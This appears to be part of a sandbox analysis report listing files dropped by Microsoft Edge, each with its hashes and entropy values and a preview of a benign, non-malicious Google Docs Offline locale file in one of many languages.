                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):939
                                                                                                                                                                                                                                                            Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                            MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                            SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                            SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                            SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):977
                                                                                                                                                                                                                                                            Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                            MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                            SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                            SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                            SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):972
                                                                                                                                                                                                                                                            Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                            MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                            SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                            SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                            SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):990
                                                                                                                                                                                                                                                            Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                            MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                            SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                            SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                            SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1658
                                                                                                                                                                                                                                                            Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                            MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                            SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                            SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                            SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1672
                                                                                                                                                                                                                                                            Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                            MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                            SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                            SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                            SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):935
                                                                                                                                                                                                                                                            Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                            MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                            SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                            SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                            SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1065
                                                                                                                                                                                                                                                            Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                            MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                            SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                            SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                            SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2771
                                                                                                                                                                                                                                                            Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                            MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                            SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                            SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                            SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):858
                                                                                                                                                                                                                                                            Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                            MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                            SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                            SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                            SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):954
                                                                                                                                                                                                                                                            Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                            MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                            SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                            SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                            SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):899
                                                                                                                                                                                                                                                            Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                            MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                            SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                            SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                            SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2230
                                                                                                                                                                                                                                                            Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                            MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                            SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                            SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                            SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1160
                                                                                                                                                                                                                                                            Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                            MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                            SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                            SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                            SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3264
                                                                                                                                                                                                                                                            Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                            MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                            SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                            SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
